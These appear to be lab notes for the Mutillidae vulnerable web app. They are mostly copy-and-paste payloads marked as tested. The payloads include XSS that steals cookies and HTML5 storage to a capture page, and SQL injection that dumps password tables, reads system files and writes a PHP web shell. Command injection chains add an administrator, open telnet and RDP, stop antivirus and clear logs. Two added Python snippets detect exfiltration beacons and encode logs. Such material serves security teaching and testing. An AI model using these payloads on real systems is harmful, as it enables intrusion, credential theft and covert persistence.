Topics
Installation
XAMPP VM
Samurai - Bootable DVD
Samurai Installation
Custom Bootable DVD

Mutillidae Uses
1. Teach web developers how to write secure code
2. Teach web developers what exploits may be possible
3. Teach web developers insecure coding patterns
4. Demonstrate to DBAs what exploits may be possible
5. Demonstrate to management what exploits may be possible

--------------------
Demonstration
--------------------
Pen Testing Methodology (CEH version)
Recon
Scanning (Discover hosts, ports, services, internal network map, Enumerating user names)
Gaining Access
Maintaining Access
Cover Tracks

----------------------------------------
BeEF Framework
----------------------------------------
Put this text into the add-to-my-blog as a blog entry: Most developers do not understand how dangerous XSS can be

----------------------------------------
Grendel Scan
----------------------------------------
Backtrack 5:
Change directory to /pentest/web/grendel-scan/.
Run grendel.sh to pull up the GUI.
Provide target URL.
Provide a non-existent output directory.
Configure plug-ins.
Run scan.
When the scan is done, click terminate scan.
Report will be generated.

----------------------------------------
RatProxy
----------------------------------------
To scan generally:
Backtrack 5:
Capture Data:
/usr/bin/ratproxy -w ~/pentests/scan-results/mutillidae/ratproxy/20110115.log -v ~/pentests/scan-results/mutillidae/ratproxy -d 192.168.56.101 -p 8088 -lextscgj
Generate Report:
ratproxy-report.sh ~/pentests/scan-results/mutillidae/ratproxy/20110115.log > mut-rat.html

To find XSS:
Backtrack 5:
Capture Data:
/usr/bin/ratproxy -w ~/pentests/scan-results/mutillidae/ratproxy/20110115.log -v ~/pentests/scan-results/mutillidae/ratproxy -d 192.168.56.101 -p 8088 -x
Generate Report:
ratproxy-report.sh ~/pentests/scan-results/mutillidae/ratproxy/20110115.log > mut-rat.html

----------------------------------------
SQLMAP
----------------------------------------
*** CONFIRMED! ***
python sqlmap.py --url="http://192.168.56.101/mutillidae/index.php?page=view-someones-blog.php" --data="author=6C57C4B5-B341-4539-977B-7ACB9D42985A&view-someones-blog-php-submit-button=View+Blog+Entries" --level=1 --beep --dump

----------------------------------------
HTML 5 - Injecting XSS into JSON
----------------------------------------
Page: pen-test-tool-lookup.php

Beginner: Pop up an alert box to show injection worked
Unencoded: "}} );alert(1);//
Complete Injection: "}} )%3balert(1)%3b//
Prefix: "}} )%3b
Payload: alert(1)%3b
Suffix: //
Copy and Paste: "}} )%3balert(1)%3b//

Intermediate: Steal cookie with redirection
Unencoded: "}} );document.location="http://localhost/mutillidae/capture-data.php?cookie=" + document.cookie;//
Prefix: "}} )%3b
Payload: document.location%3d%22http%3a%2f%2flocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3b
Suffix: //
Complete Injection: "}} )%3bdocument.location%3d%22http%3a%2f%2flocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3b//
Copy and Paste: "}} )%3bdocument.location%3d%22http%3a%2f%2flocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3b//

Professional: Steal cookies with XHR injection
--------------------------------------------------------------------------------
Generic XHR using GET and XMLHttpRequest to steal cookies - prefix and suffix as necessary - This is optimized for Firefox, which has XMLHttpRequest. Some newer IE versions will as well.
NOTE: During reconnaissance, study your target to determine what kind of browser they have so the scripts can be tailored and tested for those browsers.
--------------------------------------------------------------------------------
This is a "UDP-style GET". We fire and forget but cannot know if it succeeded or failed. Perfect for using against savvy users.
Copy and Paste:
--------------------------------------
URL Encoded Version
--------------------------------------
Prefix: "}} )%3b
Payload: var+lXMLHTTP%3btry%7b+var+lAction+%3d+%22http%3a%2f%2flocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3blXMLHTTP+%3d+new+XMLHttpRequest()%3b+lXMLHTTP.onreadystatechange+%3d+function()%7b%7d%3blXMLHTTP.open(%22GET%22%2c+lAction)%3blXMLHTTP.send(%22%22)%3b%7dcatch(e)%7b%7d
Suffix: //
Complete Injection: "}} )%3bvar+lXMLHTTP%3btry%7b+var+lAction+%3d+%22http%3a%2f%2flocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3blXMLHTTP+%3d+new+XMLHttpRequest()%3b+lXMLHTTP.onreadystatechange+%3d+function()%7b%7d%3blXMLHTTP.open(%22GET%22%2c+lAction)%3blXMLHTTP.send(%22%22)%3b%7dcatch(e)%7b%7d//
Copy and Paste: "}} )%3bvar+lXMLHTTP%3btry%7b+var+lAction+%3d+%22http%3a%2f%2flocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3blXMLHTTP+%3d+new+XMLHttpRequest()%3b+lXMLHTTP.onreadystatechange+%3d+function()%7b%7d%3blXMLHTTP.open(%22GET%22%2c+lAction)%3blXMLHTTP.send(%22%22)%3b%7dcatch(e)%7b%7d//

--------------------------------------------------------------------------------
HTML 5 - Local and session storage - setting values
--------------------------------------------------------------------------------
Setting Test Values for HTML5 Storage
// You can use these statements to set some test values.
localStorage.setItem("key1","value1");
localStorage.setItem("key2","value2");
sessionStorage.setItem("key1","value1");
sessionStorage.setItem("key2","value2");

--------------------------------------------------------------------------------
HTML 5 - Local and session storage - Reading values
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Reading current HTML5 storage from local browser
--------------------------------------------------------------------------------
Copy and Paste:
// JavaScript Alert Box Method
// window.document.write method
Copy and Paste both scripts (DOM injection version) - TESTED SUCCESSFULLY
DANGER: DON'T MOUSEOVER
// Firebug console.log() or console.debug() method
// NOTE: This version must be executed in the Firebug console. The script tags are not needed.
try{var m = "";var l = window.localStorage;var s = window.sessionStorage;for(i=0;i
localStorage.setItem("AccountNumber","123456");
sessionStorage.setItem("EnterpriseSelfDestructSequence","A1B2C3");
sessionStorage.setItem("SessionID","japurhgnalbjdgfaljkfr");
sessionStorage.setItem("CurrentlyLoggedInUser","1233456789");
Copy and Paste script to add values - TESTED SUCCESSFULLY
Copy and Paste script to read values (Alert box version)
Copy and Paste both scripts (Cross Site Scripting version - Reflected) - TESTED SUCCESSFULLY
Copy and Paste both scripts (Cross Site Scripting version - Persistent) - TESTED SUCCESSFULLY
NOTE: This version "MySQL escapes" the "\n" new-line character by doubling up the "\" character because "\n" means new-line in MySQL and this is going to be inserted into the database.
Copy and Paste both scripts (DOM injection version) - TESTED SUCCESSFULLY
DANGER: DON'T MOUSEOVER
Copy and Paste both scripts (Firebug console version) - TESTED SUCCESSFULLY
try{localStorage.setItem("AccountNumber","789456");sessionStorage.setItem("EnterpriseSelfDestructSequence","A1B2C3");sessionStorage.setItem("SessionID","japurhgnalbjdgfaljkfr");sessionStorage.setItem("CurrentlyLoggedInUser","1233456789");}catch(e){alert(e.message);}try{var m = "";var l = window.localStorage;var s = window.sessionStorage;for(i=0;i
localStorage.setItem("NewSessionToken","This was set by a XSS.");
var node=window.document.getElementById("idSessionStorageTableBody");
while(node.hasChildNodes()){node.removeChild(node.firstChild)};
init();

--------------------------------------------------------------------------------
HTML 5 - Local and session storage - Altering values
--------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------
Over-writing Storage (Possible Session Fixation) - Set or change current HTML5 values in own browser
----------------------------------------------------------------------------------------------
Copy and Paste all three scripts (Firebug console version) - TESTED SUCCESSFULLY (first script reads, second script overwrites, third script reads again)
try{var m = "";var l = window.localStorage;var s = window.sessionStorage;for(i=0;i
DANGER: DON'T MOUSEOVER

----------------------------------------------------------------------------------------------
Over-writing Storage (Possible Session Fixation) - Set or change another user's HTML5 values
----------------------------------------------------------------------------------------------
Example JavaScript Reflected (First Order) Cross Site Script - TESTED SUCCESSFULLY
Copy and Paste all three cross site scripts (alert box version) (first script reads, second script overwrites, third script reads again):
Persistent (Stored, Second Order) Cross Site Script - TESTED SUCCESSFULLY
Copy and Paste all three cross site scripts (alert box version) (first script reads, second script overwrites, third script reads again):
NOTE: This version "MySQL escapes" the "\n" new-line character by doubling up the "\" character because "\n" means new-line in MySQL and this is going to be inserted into the database.
DOM injected Cross Site Script - TESTED SUCCESSFULLY
Copy and Paste all three cross site scripts (alert box version) (first script reads, second script overwrites, third script reads again):
DANGER: WHATEVER YOU DO, FOR CRYING OUT LOUD PLEEAASSEEEE DON'T MOUSEOVER

--------------------------------------------------------------------------------
HTML 5 - Local and session storage - Deleting values
--------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------
Deleting own HTML5 Storage
----------------------------------------------------------------------------------------------
Copy and Paste all three scripts (Firebug console version) - TESTED SUCCESSFULLY (first script reads, second script deletes, third script reads again)
try{var m = "";var l = window.localStorage;var s = window.sessionStorage;for(i=0;i
DANGER: DON'T MOUSEOVER

----------------------------------------------------------------------------------------------
Deleting another user's HTML5 Storage
----------------------------------------------------------------------------------------------
Example JavaScript Reflected (First Order) Cross Site Script - TESTED SUCCESSFULLY
Copy and Paste all three cross site scripts (alert box version) (first script reads, second script overwrites, third script reads again):
Persistent (Stored, Second Order) Cross Site Script - TESTED SUCCESSFULLY
Copy and Paste all three cross site scripts (alert box version) (first script reads, second script overwrites, third script reads again):
NOTE: This version "MySQL escapes" the "\n" new-line character by doubling up the "\" character because "\n" means new-line in MySQL and this is going to be inserted into the database.
DOM injected Cross Site Script - TESTED SUCCESSFULLY
Copy and Paste all three cross site scripts (alert box version) (first script reads, second script overwrites, third script reads again):
DANGER: WHATEVER YOU DO, FOR CRYING OUT LOUD PLEEAASSEEEE DON'T MOUSEOVER

--------------------------------------------------------------------------------
Deleting values to HTML5 Storage and re-displaying page - PRO VERSION
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
HTML 5 - Local and session storage - Stealing values
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Stealing another user's HTML5 Storage: Testing
--------------------------------------------------------------------------------
Script to test stealing Local Storage. Inject this into a cross-site scripting vulnerability. Add a prefix and suffix as necessary.
// XSS to steal local storage and session storage
Copy and Paste:

--------------------------------------------------------------------------------
Steal HTML5 storage with redirection: Intermediate
--------------------------------------------------------------------------------
Copy and Paste - Reflected Cross Site Script - TESTED SUCCESSFULLY
Copy and Paste - Persistent Cross Site Script - TESTED SUCCESSFULLY
NOTE: This version "MySQL escapes" the "\n" new-line character by doubling up the "\" character because "\n" means new-line in MySQL and this is going to be inserted into the database.
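Both ways of stealing cookies or HTML5 storage in these notes (the redirection variant just above and the XHR "UDP-style GET" variant) end the same way: a GET to capture-data.php with the victim's browser state in the query string. In the lab the capture page is on the same host, so the beacon lands in the target's own access log; in a real incident the capture endpoint would be attacker-controlled and the same check belongs on the proxy or egress log. As an added example, not part of the original notes or of the Mutillidae project, the Python below parses constructed Apache combined-format log lines and flags requests whose query parameters look like a cookie or storage dump. The log lines are constructed; capture-data.php and the cookie parameter name are the page's own, the other parameter names and value markers are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (Apache combined format) for the demo; not real traffic.
SAMPLE_LOG = """\
192.168.56.1 - - [15/Jan/2011:10:02:11 -0500] "GET /mutillidae/index.php?page=home.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.56.1 - - [15/Jan/2011:10:02:15 -0500] "GET /mutillidae/capture-data.php?cookie=PHPSESSID%3Dabc123%3B%20showhints%3D1 HTTP/1.1" 200 12 "http://192.168.56.101/mutillidae/index.php?page=add-to-your-blog.php" "Mozilla/5.0"
192.168.56.1 - - [15/Jan/2011:10:02:19 -0500] "GET /mutillidae/capture-data.php?cookie=localStorage.AccountNumber%3D123456%0AsessionStorage.SessionID%3Djapurhgnalbjdgfaljkfr HTTP/1.1" 200 12 "-" "Mozilla/5.0"
192.168.56.1 - - [15/Jan/2011:10:03:01 -0500] "POST /mutillidae/index.php?page=login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [ts] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Query parameter names a capture/beacon endpoint typically receives (assumed list).
SUSPECT_PARAMS = {"cookie", "storage", "localstorage", "sessionstorage", "data"}
# Substrings that mark a value as browser state rather than an ordinary form field (assumed).
SUSPECT_VALUE_MARKERS = ("phpsessid=", "sessionstorage", "localstorage", "sessionid=")


def parse_line(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_exfil_beacons(log_text):
    """Scan log text and return one hit per query parameter that looks like an exfil beacon.

    parse_qs percent-decodes the values, so %3D/%0A sequences used by the
    payloads above are inspected as the '=' and newline they encode.
    """
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        for name, values in parse_qs(parts.query, keep_blank_values=True).items():
            value = values[0]
            lowered = value.lower()
            if name.lower() in SUSPECT_PARAMS or any(mk in lowered for mk in SUSPECT_VALUE_MARKERS):
                hits.append({"ip": rec["ip"], "ts": rec["ts"], "path": parts.path,
                             "param": name, "value": value, "referer": rec["referer"]})
    return hits


def beacons_by_source(hits):
    """Count beacon hits per client address, the first thing to pivot on in triage."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for h in find_exfil_beacons(SAMPLE_LOG):
        print(h["ts"], h["ip"], h["path"], h["param"], repr(h["value"]), "referer:", h["referer"])
    print(beacons_by_source(find_exfil_beacons(SAMPLE_LOG)))
```

The Referer field is worth keeping in the hit: for a reflected or stored injection it usually names the page that carried the script (add-to-your-blog.php in the constructed sample), which is where the fix has to go.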
--------------------------------------------------------------------------------
Steal HTML5 storage with XHR injection: Professional
--------------------------------------------------------------------------------
Generic XHR using GET and XMLHttpRequest to steal cookies - prefix and suffix as necessary - This is optimized for Firefox, which has XMLHttpRequest. Some newer IE versions will as well.
NOTE: During reconnaissance, study your target to determine what kind of browser they have so the scripts can be tailored and tested for those browsers.
--------------------------------------------------------------------------------
This is a "UDP-style GET". We fire and forget but cannot know if it succeeded or failed. Perfect for using against savvy users.
Collect the HTML5 storage first, then send the information to a capture page.
Copy and Paste Reflected Cross Site Script - TESTED SUCCESSFULLY
Copy and Paste Persistent (Stored, Second Order) Cross Site Script - TESTED SUCCESSFULLY
NOTE: This version "MySQL escapes" the "\n" new-line character by doubling up the "\" character because "\n" means new-line in MySQL and this is going to be inserted into the database.
Copy and Paste DOM injected Cross Site Script - THIS NEEDS WORK - Causes SQL errors
DANGER: WHATEVER YOU DO, PLEEAASSEEEE DON'T MOUSEOVER

-------------------------
Command Injection
-------------------------
Page: dns-lookup.php

Recon: Discover available functionality using provided help
Windows XP: && help
Linux: && --help
Linux: && man

Recon: Determine current directory
Windows XP: && dir
Linux: && pwd

Recon: Chain commands to discover directory structure
Windows XP: && cd ../../.. && dir
Linux: && cd ../../.. && ls -l

Recon: Get a list of offerings provided by the "net.exe" program
Windows XP: && net

Recon: Get a list of services that can be started or stopped
Windows XP: && net start
Windows XP: && net stop

Scanning: Get machine network settings, hostname, DNS servers, subnet mask, etc.
Windows XP: && ipconfig /all
Linux: && ifconfig

Scanning: Discover hosts on network
Windows XP: && ping -n 1 192.168.56.102
Linux: && ping -c 1 192.168.56.102

Scanning: Enumerate current user
Windows XP: && set
Linux: && whoami

Scanning: Enumerate computers, users, groups, AD computers, AD users, AD groups
Windows XP: && net view [/domain]
Windows XP: && net user [/domain]
Windows XP: && net localgroup [/domain]

Gaining Access: Add user
Windows XP: && net user /add
Linux: useradd

Gaining Access: Delete user
Windows XP: && net user /delete

Maintain Access: Get Windows Service Names
Windows: sc query

Maintain Access: kill AV
net stop

Maintain Access: kill firewall
Windows XP SP3: net stop netsvcs

Maintain Access: Kill AV/protective services or open backdoor services
Windows XP: net stop
Windows XP: && net start telnet
Windows XP: && net stop telnet

Cover Tracks: Clear logs
Windows XP: && wevtutil cl

Covering Tracks: Database Exploits via Command Injection
Linux (Samurai): 192.168.1.1; mysql --user=root --password=samurai --execute="DROP TABLE accounts" owasp10

Recon: Explore Database Files
Windows XP: && cd c:/xampp/mysql && dir

------------------------------------------------------------------------------------------------------------
Command Injection: Enable Windows Telnet Service (Windows XP SP3)
------------------------------------------------------------------------------------------------------------
NOTE: Similar to Meterpreter run gettelnet
List all services (sc query state= all)
whatever && sc query state= all
Check if service is running (sc query tlntsvr)
whatever && sc query tlntsvr
Configure telnet service to "demand" (sc config tlntsvr start= demand)
whatever && sc config tlntsvr start= demand
Start tlntsvr service (sc start tlntsvr)
whatever && sc start tlntsvr
Add user (net user /add)
whatever && net user /add
Add Telnet users group (net localgroup TelnetClients /add)
whatever && net localgroup TelnetClients /add
Add users to Administrators group (net localgroup Administrators /add)
whatever && net localgroup Administrators /add
Add Telnet user to group (net localgroup TelnetClients /add)
whatever && net localgroup TelnetClients /add
Allow firewall access (netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=custom addresses=)
whatever && netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=custom addresses=

----------------------------
One combined injection:
----------------------------
whatever && sc config tlntsvr start= demand && sc start tlntsvr && net user root toor /add && net localgroup TelnetClients /add && net localgroup Administrators root /add && net localgroup TelnetClients root /add && netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=custom addresses=192.168.56.101

------------------------------------------------------------------------------------------------------------
Command Injection: Enable Windows XP SP3 and similar Remote Desktop Terminal Service
------------------------------------------------------------------------------------------------------------
Check if service running (sc query termservice)
Configure service from "disabled" to "manual" (sc config termservice start= demand)
Start service (sc start termservice)
Enable Terminal Services (reg add "hklm\system\currentcontrolset\control\terminalserver" /v fdenytsconnections /t reg_dword /d 0 /f)
Enable Terminal Services (reg add "hklm\system\currentcontrolset\control\terminalserver" /v TSEnabled /t reg_dword /d 1 /f)
Check if service listening (netstat -na | find "3389")
Add user (net user /add)
Add user to group (net localgroup "Remote Desktop Users" /add)
Configure firewall to allow RDP (netsh firewall set service type=remotedesktop mode=enable scope=custom addresses=)

-------------------------
SQL Injection
-------------------------
Recon: Returns a string that indicates the MySQL server version
Page: user-info.php
Field: Username
Value: ' union select null,VERSION() AS username,null,null --
' union select null,null,null,version() --

Recon: Returns a string that indicates the current database name
Page: user-info.php
Field: Username
Value: ' union select null,DATABASE() AS username,null,null --

Recon: Returns a string that indicates the current database username
Page: user-info.php
Field: Username
Value: ' union select null,USER() AS username,null,null --

Recon: Extract table names from database
Page: user-info.php
Field: Username
' union select null,table_schema AS username,table_name AS password,null from INFORMATION_SCHEMA.TABLES--

Recon: Extract table columns from database using a single field
Page: user-info.php
Field: Username
Value: ' union select null,concat_ws('.', table_schema, table_name, column_name) AS username,null,null from INFORMATION_SCHEMA.COLUMNS--

Recon: Extract views from database (Doesn't work in MySQL 5.1.8)
Page: user-info.php
Field: Username
Value: ' union select null,concat_ws('.', table_schema, table_name, view_definition) AS username,null,null from INFORMATION_SCHEMA.VIEWS--

Recon: Extract triggers from database
Page: user-info.php
Field: Username
Value: ' union select null,concat_ws('.', trigger_schema, trigger_name) AS username,null,null from INFORMATION_SCHEMA.TRIGGERS--

Recon: Extract routines/procs from database
Page: user-info.php
Field: Username
Value: ' union select null,concat_ws('.', routine_schema, routine_name, '(', routine_type, ')') AS username,null,null from INFORMATION_SCHEMA.ROUTINES--

Recon: Extract metadata from database
Page: user-info.php
Field: Username
Value: ' union select null,concat_ws('.', table_schema, table_name, column_name) AS username,null,null from INFORMATION_SCHEMA.COLUMNS union select null,concat_ws('.', routine_schema, routine_name, routine_type, routine_body) AS username,null,null from INFORMATION_SCHEMA.ROUTINES union select null,concat_ws('.', table_schema, table_name, view_definition) AS username,null,null from INFORMATION_SCHEMA.VIEWS union select null,concat_ws('.', trigger_schema, trigger_name) AS username,null,null from INFORMATION_SCHEMA.TRIGGERS--

Recon/Scanning: Get specifications on database software
Page: user-info.php
Field: Username
Value: ' union select null, database(), current_user(), version() --

Gaining Access: Extract passwords from user table
Value: ' union select null, owasp10.accounts.username AS username, owasp10.accounts.password AS password, null from owasp10.accounts --

Maintaining Access:
Covering Tracks:

Page: login.php
Gaining Access: Using SQL Injection
' or 1=1 --

Inserting new user using insert injection to bypass any protections. This example inserts a cross site script.
Page: Register.php
Field: Username
backdoor','password','') --
Note: Kind of pointless but still fun

Using advanced techniques: Select Concat Char
Page: user-info.php
This allows injection to select arbitrary text. This can be useful to bypass filters and WAFs.
' UNION ALL SELECT null,CONCAT(CHAR(112, 97, 115, 115, 119, 111, 114, 100)),null,null --

Using advanced techniques: Select Using IFNULL to search for columns
Page: user-info.php
' UNION ALL SELECT null,IFNULL(CAST(username AS CHAR),CHAR(32)),IFNULL(CAST(password AS CHAR),CHAR(32)),null FROM accounts --

Using advanced techniques: Open files on target operating system
Page: user-info.php
Field: username
Values:
' union select null, LOAD_FILE('../README') AS username, null, null--
' union select null, LOAD_FILE('..\\..\\..\\..\\WINDOWS\\system32\\drivers\\etc\\hosts') AS username, null, null--
' union select null, LOAD_FILE('..\\..\\..\\..\\WINDOWS\\inf\\cpu.inf') AS username, null, null--
' union select null, LOAD_FILE('mysql_error.log'), null, null--
' union select null, LOAD_FILE('..\\..\\..\\htdocs\\mutillidae\\index.php'), null, null--

Using advanced techniques: Writing files to operating system
Page: user-info.php
Field: username
Values:
' union select null,null,null,'
Please enter system command
Command
";echo shell_exec($_REQUEST["pCommand"]);echo ""; ?>' INTO DUMPFILE '..\\..\\htdocs\\mutillidae\\backdoor.php' --
Please enter system command
Command
"; echo shell_exec($_REQUEST["pCommand"]); echo ""; ?>
Please enter system command
Command
";echo shell_exec($_REQUEST["pCommand"]);echo ""; ?>

Using advanced techniques: Insert Injection
Technique: SQL Insert Injection
Page: add-to-your-blog.php
Field: blog
Value: BARK','2003-12-31 01:02:03') --

--------------------------------------------------
Blind SQL Injection
--------------------------------------------------
Recon: Blind SQL Injection/Brute Forcing values
' union Select null, case current_user() when 'root@localhost' THEN sleep(5) ELSE sleep(0) END, null, null --
' union select null, null, null, IF(((SELECT count(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_name = 'user') > 0), sleep(5), sleep(0)) --
' union Select null, case current_user() when 'root@localhost' THEN sleep(5) ELSE sleep(0) END, null, null --
' union Select null, sleep(5) --

Page: login.php
Technique: Blind SQL Injection - Timing
Field: username
Value (Using Proxy): ' union Select null, case SUBSTRING(current_user(),1,1) when 'r' THEN sleep(5) ELSE sleep(0) END, null, null --
Value (Using Direct Request): username=%27%20union%20Select%20null%2C%20case%20SUBSTRING%28current_user%28%29%2C1%2C1%29%20when%20%27r%27%20THEN%20sleep%285%29%20ELSE%20sleep%280%29%20END%2C%20null%2C%20null%20--%20&password=&login-php-submit-button=1

Page: login.php
Technique: Blind SQL Injection - True and False Values
Field: username
True Value (Using Proxy): ' or 1=1 --
False Value (Using Proxy): ' and 1=0 --
Examine responses to see if they are different

------------------------------------------------------------------------------------------
Broken Authentication and Session Management - Escalating privileges
------------------------------------------------------------------------------------------
Gaining Access: Using insecure client-side authentication tokens
Page: Any page
Tool: Web Developer Toolbar
Note what cookies the site has by default
Create a test account
Login using test account
Check what cookies the site has after authentication
Logout
Verify auth cookies are gone or get rid of them
Create a new cookie based on the original auth cookie, but with a different value

Gaining Access: Using insecure client-side authentication tokens
Page: Any page
Tool: Cookies Manager+ version 1.5.1 (verified with Firefox 4.0.1)
Note what cookies the site has by default
Create a test account
Login using test account
Check what cookies the site has after authentication
Differential Analysis: Change the value of the original auth cookie
Work backwards until admin account is found

------------------------------------------------------------------------------------------
Broken Authentication and Session Management - Bypass Authorization Control
------------------------------------------------------------------------------------------
Gaining Access: Using SQL injection
Page: login.php
Field: Username
Value: ' or 1=1 --

Gaining Access: Using SQL injection
Page: login.php
Field: Username
Value: ' --

------------------------------------------------------------
Insecure Direct Object Reference - Accessing system files
------------------------------------------------------------
Step 1: Recon: Obtain list of files
Possible Technique: Use command injection
Page: dns-lookup.php
Value (Windows): && dir /w
Value (Linux): && pwd && ls -l
Possible Techniques: Use robots.txt
Possible Techniques: Use directory browsing
Possible Techniques: Use directory brute-forcing

Step 2: Gaining Access: Retrieve system files
Page: source-viewer.php
Technique: Use proxy to change value, Use parent directory to bypass jails
Tool: Tamper Data, Paros, WebScarab, Burp
Field: phpfile
Value: , ../../../boot.ini, ..\..\..\WINDOW\System32\drivers\etc\hosts, ../../../etc/passwd

-----------------------------
Cross Site Scripting
-----------------------------
Page: add-to-your-blog.php
Field: blog contents
Value:

HTTP Header: Browser User Agent String
Tool: User Agent Switcher
Value:

(Script stripped in extraction; the injected fake login form reads "Sorry, please login again" and shows Username and Password fields.)
Defense: Encoding

Defense When certain tokens allowed: Mapping
Page: add-to-your-blog.php
Field: blog contents
Tool: Burp-Suite
Value:
(Script stripped in extraction; the injected fake login form reads "We're sorry. This session has expired. Please login again." and shows Username and Password fields.)
Defense: Encoding
Page: add-to-your-blog
Field: blog contents
Value:

-----------------------------
Cross Site Request Forgery
-----------------------------
Page: add-to-your-blog, view-someones-blog
Tool: HTTPFox (to view forged request)
Force someone to add a blog without consent:
Dancing with the stars results
Force someone to log out:
How to improve your Facebook status
Force someone to add a blog without consent (Credit: Udit Bajaj):
CECS 566 Test 2 solutions!
Force someone to register without their consent:
Hello World
Force someone to register without their consent:
Here is the same example using XHR rather than the "onmouseover" event:

------------------------------------------------------------------------------------
Sample to perform cross-site script on the Add to Your Blog that will perform CSRF on the User Poll
------------------------------------------------------------------------------------
Vote for nmap. I know you will.

-------------------------
Security Misconfiguration
-------------------------
Improper Error Handling:
Page: login.php
Field: username
Value:
Result: Error gives SQL exception

---------------------------------
Insecure Direct Object References
---------------------------------
Page: source-viewer.php
Field: phpfile
Value (Windows XP): c:\boot.ini, C:\WINDOWS\system32\drivers\etc\hosts
Tool: netcat, tamper data, paros, webscarab, burp
Use netcat or hackbar to send in post data:
phpfile=c:\boot.ini&source-file-viewer-php-submit-button="View File"
phpfile=C:\WINDOWS\system32\drivers\etc\hosts&source-file-viewer-php-submit-button="View File"
Alternative: Use proxy to change value of phpfile to system file

---------------------------------
Insecure Cryptographic Storage
---------------------------------
Extract passwords from system:
Page: user-info.php
Technique: Direct SQL injection
Field: username
Value: ' or 1=1 --

Page: user-info.php
Technique: Indirect SQL injection
Field: username
Value: ' union select null, owasp10.accounts.username AS username, owasp10.accounts.password AS password, null from owasp10.accounts --

Page: login.php
Technique: Blind SQL Injection
Field: username
Value (Using Proxy): ' union Select null, case SUBSTRING(current_user(),1,1) when 'r' THEN sleep(5) ELSE sleep(0) END, null, null --
Value (Using Direct Request): username=%27%20union%20Select%20null%2C%20case%20SUBSTRING%28current_user%28%29%2C1%2C1%29%20when%20%27r%27%20THEN%20sleep%285%29%20ELSE%20sleep%280%29%20END%2C%20null%2C%20null%20--%20&password=&login-php-submit-button=1

---------------------------------
Failure to Restrict URL Access
---------------------------------
Page: robots.txt
Technique: Security Misconfiguration, Design Flaw
Recon: List Files
Technique: Shoulder surfing
Recon: List Files
Technique: Steal Bookmarks
Recon: List Files
Technique: Dump client cache
Recon: List Files
Page: dns-lookup.php
Technique: Command Injection
Field: hostname
Scanning: View Source Code
Page: dns-lookup.php
Technique: Command Injection
Field: hostname
Value: && type config.inc (then see source because PHP code doesn't show in browser)
Gaining Access: View restricted page
Page: Any (e.g. http://localhost/mutillidae/config.inc, http://localhost/mutillidae/passwords/accounts.txt)
Technique: Type in URL

------------------------------------------
Insufficient Transport Layer Protection
------------------------------------------
Gaining Access: Intercept clear text credentials
Page: login.php
Tool: Use any proxy (Paros, Tamper Data) or sniffer (Wireshark, TCPDump, Snort, etc.)
Fields: Username and Password

------------------------------------------
Unvalidated redirects and forwards
------------------------------------------
Page: credits.php
Technique: Phishing
Tool: Any proxy, netcat, hackbar
Field: forwardurl
Value: any URI

Page: credits.php
Technique: Horizontal Application Attack, Restricted URL Access, Authorization Bypass
Tool: Hackbar, anything that can change the URL query parameters
Field: forwardurl
Value: http://localhost/xampp

--------------------------------------------
Information Asset Protection - Cache Control
--------------------------------------------
Recon: Grab leaked company information
Page: index.php, all
Technique: View local cache
Tool: Firefox about:cache, Internet Explorer Tools-->Options-->General Tab-->Browser History Settings-->View Files
Defenses: cache control headers

--------------------------------------------
Information Asset Protection - Framing
--------------------------------------------
Gaining Access: Cross Frame Scripting/Click-jacking
Page: index.php, all
Technique: Frame page, use overlay
Tool (to view defenses): HTTPFox
Defense: x-frame-options, frame busters

----------------------------------------------
Information Asset Protection - Leaked Comments
----------------------------------------------
Page: index.php
Technique: View Source
Tool: View Source, Sniffer (Wireshark), HTTPFox
Defense: Use framework comment tags to trap comments on the app server

----------------------------------------------
Log Injection
----------------------------------------------
Page: show-log.php
Technique: Figure out what fields are logged, which of those the client controls, and inject those fields with SQL injection, HTML injection, XSS, XSRF, etc.
Defense: Logs should be output encoded

--------------------------------------------------------------------------------
Generic XHR to steal cookies (prefix and suffix as necessary)
--------------------------------------------------------------------------------
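The Log Injection section ends with the one-line defense "Logs should be output encoded". As an added example, not taken from these notes or from Mutillidae, the Python below shows what that means for a show-log.php-style viewer, with the weak pattern beside the hardened one: the naive writer joins raw fields with spaces, so a client-controlled field such as the User-Agent can forge a second log record; the hardened writer escapes control characters and emits one JSON record per line, and the viewer HTML-encodes every field again at render time so a stored payload cannot run as XSS when the log is viewed. The hostile User-Agent and the field names are constructed for the demo.

```python
import html
import json
import re

# ASCII control characters (CR and LF included), DEL, and the Unicode line/paragraph
# separators, which some browsers treat as line breaks.
_CONTROL_RE = re.compile(r'[\x00-\x1f\x7f\u2028\u2029]')

# Constructed sample: a User-Agent that carries a forged second record and a script tag.
HOSTILE_UA = ('Mozilla/5.0\n2011-01-15 10:02:11 192.168.56.1 login.php - "admin logged in"'
              '<script>alert(1)</script>')


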